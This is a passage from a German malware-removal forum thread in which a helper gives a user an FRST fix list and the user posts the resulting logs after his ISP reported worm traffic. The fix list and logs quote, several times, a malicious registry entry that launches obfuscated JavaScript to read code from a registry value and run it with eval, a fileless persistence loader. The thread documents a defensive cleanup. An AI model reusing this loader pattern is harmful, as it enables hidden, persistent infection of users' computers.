(\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-07-05 21:28:31.069 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-05-20 13:12:31.840 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-05-06 20:55:49.642 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-04-20 20:43:22.953 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-04-20 20:06:11.606 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-04-19 20:40:43.841 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-04-19 20:18:44.959 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. ==================== Speicherinformationen =========================== Prozessor: Intel(R) Core(TM) i7-5820K CPU @ 3.30GHz Prozentuale Nutzung des RAM: 19% Installierter physikalischer RAM: 16279.21 MB Verfügbarer physikalischer RAM: 13118.89 MB Summe virtueller Speicher: 18711.21 MB Verfügbarer virtueller Speicher: 14960.39 MB ==================== Laufwerke ================================ Drive c: () (Fixed) (Total:237.69 GB) (Free:75.21 GB) NTFS Drive f: (Volume) (Fixed) (Total:3725.96 GB) (Free:3665.1 GB) NTFS Drive g: (Volume) (Fixed) (Total:3725.96 GB) (Free:2787.59 GB) NTFS ==================== MBR & Partitionstabelle ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: BE291492) Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=449 MB) - (Type=27) ======================================================== Disk: 1 (MBR Code: Windows 7 or 8) (Size: 7452 GB) (Disk ID: 00000000) Partition: GPT. ==================== Ende von Addition.txt ============================ |
09.08.2017, 22:07 | #29 |
/// Winkelfunktion /// TB-Süch-Tiger™ | UPC meldet: Virus, würmer werden über meine IP versendet FRST-Fix Virenscanner jetzt bitte komplett deaktivieren, damit sichergestellt ist, dass der Fix sauber durchläuft! Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster. Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument Code:
ATTFilter HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <==== ACHTUNG C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG C:\Program Files (x86)\IObit HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://search.avira.net/#web/result?source=art&q= FF Extension: (Avira Browser Safety) - C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01] FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei] FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei] HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG Task: {41006DFD-D327-4048-9208-BB616205BF64} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG emptytemp: Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
__________________ Logfiles bitte immer in CODE-Tags posten |
10.08.2017, 17:13 | #30 |
| UPC meldet: Virus, würmer werden über meine IP versendet hmm das Programm wurde von Windows Frühzeitig abgewürgt. Ich probiers gleich nochmal Edit: Hmm kann den Windows Defender seit neustem Update nicht mehr ausschalten....interesssant ....vielleicht wurde deswegen die Operation abgebrochen Code:
ATTFilter Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-08-2017 durchgeführt von Martin333 (10-08-2017 17:45:04) Run:1 Gestartet von C:\Users\Martin ***\Desktop Geladene Profile: Martin *** (Verfügbare Profile: Martin**) Start-Modus: Normal ============================================== fixlist Inhalt: ***************** HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschr�nkung <==== ACHTUNG HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschr�nkung <==== ACHTUNG C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG C:\Program Files (x86)\IObit HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://search.avira.net/#web/result?source=art&q= FF Extension: (Avira Browser Safety) - C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01] FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei] FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei] HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG Task: {41006DFD-D327-4048-9208-BB616205BF64} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG emptytemp: ***************** HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => Schlüssel erfolgreich entfernt "C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG" => nicht gefunden. C:\Program Files (x86)\IObit => erfolgreich verschoben HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com => nicht gefunden. HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.0 => Schlüssel erfolgreich entfernt HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.1 => Schlüssel erfolgreich entfernt RegLink Found. Source: "" => Target: "HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes" HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\ => Schlüssel erfolgreich entfernt HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas => Schlüssel nicht gefunden. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{057EAF51-6043-4A2C-8C62-FA5066DFA7DE} => Schlüssel konnte nicht entfernt werden. Zugriff verweigert. hier der Restlog: Code:
ATTFilter Ergebnis der geplanten Datei-Verschiebungen (Start-Modus: Normal) (Datum&Uhrzeit: 10-08-2017 18:07:14) Ergebnis der geplanten Schlüssel-Entfernung nach dem Neustart: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{057EAF51-6043-4A2C-8C62-FA5066DFA7DE} => Schlüssel erfolgreich entfernt ==== Ende vom Fixlog 18:07:14 ==== Code:
ATTFilter Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-08-2017 durchgeführt von Martin **** (10-08-2017 18:09:56) Run:2 Gestartet von C:\Users\Martin**\Desktop Geladene Profile: Martin****(Verfügbare Profile: Martin 33) Start-Modus: Normal ============================================== fixlist Inhalt: ***************** HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschr�nkung <==== ACHTUNG HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschr�nkung <==== ACHTUNG C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG C:\Program Files (x86)\IObit HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://search.avira.net/#web/result?source=art&q= FF Extension: (Avira Browser Safety) - C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01] FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei] FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei] HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG Task: {41006DFD-D327-4048-9208-BB616205BF64} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG emptytemp: ***************** HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => Schlüssel konnte nicht entfernt werden, Schlüssel könnte geschützt sein HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => Schlüssel nicht gefunden. "C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG" => nicht gefunden. "C:\Program Files (x86)\IObit" => nicht gefunden. HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com => nicht gefunden. HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.0 => Schlüssel nicht gefunden. HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.1 => Schlüssel nicht gefunden. RegLink Found. Source: "" => Target: "HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes" HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\ => Schlüssel erfolgreich entfernt HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas => Schlüssel nicht gefunden. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{057EAF51-6043-4A2C-8C62-FA5066DFA7DE} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{189B4981-5161-4573-95FB-914ABF5857A2} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{189B4981-5161-4573-95FB-914ABF5857A2} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2C71CB98-75B2-4838-9B99-8BB2257CEC5B} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2C71CB98-75B2-4838-9B99-8BB2257CEC5B} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{41006DFD-D327-4048-9208-BB616205BF64} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{41006DFD-D327-4048-9208-BB616205BF64} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{43681C05-5E15-43E2-93BB-8585D47F91E4} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{43681C05-5E15-43E2-93BB-8585D47F91E4} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{54193568-FA18-42AA-AA36-72AE0A69F1CE} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{54193568-FA18-42AA-AA36-72AE0A69F1CE} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{749258DE-50AA-45E3-A106-4D57EA1939D4} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{749258DE-50AA-45E3-A106-4D57EA1939D4} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{DB66428E-B85F-4EDD-BC33-43CAA577BBCA} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DB66428E-B85F-4EDD-BC33-43CAA577BBCA} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FDC309C3-7CAB-43AD-8822-78E3C63B88B4} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FDC309C3-7CAB-43AD-8822-78E3C63B88B4} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d => Schlüssel erfolgreich entfernt =========== EmptyTemp: ========== BITS transfer queue => 7888896 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 15107038 B Java, Flash, Steam htmlcache => 682660468 B Windows/system/drivers => 49826 B Edge => 1498 B Chrome => 26815042 B Firefox => 4030740 B Opera => 119808 B Temp, IE cache, history, cookies, recent: Default => 0 B Users => 0 B ProgramData => 0 B Public => 0 B systemprofile => 128 B systemprofile32 => 128 B LocalService => 0 B NetworkService => 4440 B Martin Walser => 33398127 B RecycleBin => 11136170 B EmptyTemp: => 745 MB temporäre Dateien entfernt. ================================ Ergebnis der geplanten Datei-Verschiebungen (Start-Modus: Normal) (Datum&Uhrzeit: 10-08-2017 18:11:25) Ergebnis der geplanten Schlüssel-Entfernung nach dem Neustart: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => Schlüssel erfolgreich entfernt ==== Ende vom Fixlog 18:11:26 ==== Geändert von Lost_Viking (10.08.2017 um 16:59 Uhr) |
Themen zu UPC meldet: Virus, würmer werden über meine IP versendet |
bot, conficker, direkt, erhalte, eröffnet, guten, log, lokal, malware, meldet, namen, neue, neuen, nicht mehr, problem, recovery, scan, sicherheitslücke, thread, tool, trojaner, virus, welchem, wurm, würmer |